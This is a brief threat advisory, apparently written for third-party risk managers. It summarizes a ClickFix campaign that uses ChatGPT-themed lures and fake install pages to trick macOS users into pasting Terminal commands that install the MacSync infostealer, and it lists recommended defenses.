ClickFix Campaigns Target macOS Users with ChatGPT‑Powered Lures Deploying MacSync Infostealer
What Happened — Sophos researchers identified a new wave of ClickFix attacks that have migrated from Windows‑only to macOS environments. Attackers use ChatGPT‑related search results and forged GitHub‑style installation pages to convince victims to copy‑paste malicious Terminal commands, which download and execute the MacSync infostealer.
Why It Matters for TPRM —
- Social‑engineering techniques that exploit trusted AI services can bypass traditional security controls on employee workstations.
- macOS devices are increasingly used in high‑value sectors (design, finance, R&D); a successful infection can lead to credential theft and exfiltration of proprietary data.
- The campaign’s tracking infrastructure (JS analytics, Telegram bots) provides attackers with real‑time visibility into which third‑party vendors’ employees are being compromised.
Who Is Affected — Enterprises that allow macOS endpoints, especially in technology, finance, education, creative services, and any organization that promotes AI‑assisted tooling.
Recommended Actions —
- Reinforce user awareness training focused on AI‑generated content and “copy‑and‑paste” commands.
- Enforce application allow‑lists and enable strict Gatekeeper/XProtect policies; consider endpoint detection that monitors for unauthorized Terminal activity.
- Deploy network‑level URL filtering to block known malicious domains used in ClickFix payload delivery.
Technical Notes — Attack vector: phishing‑style lures via malicious Google‑sponsored links and fabricated ChatGPT conversation pages. The malicious Bash script is obfuscated, requests the user’s password, and then pulls a Mach‑O binary (MacSync) that harvests credentials, browser data, and files. The technique specifically circumvents macOS security controls such as Gatekeeper and XProtect. Source: Security Affairs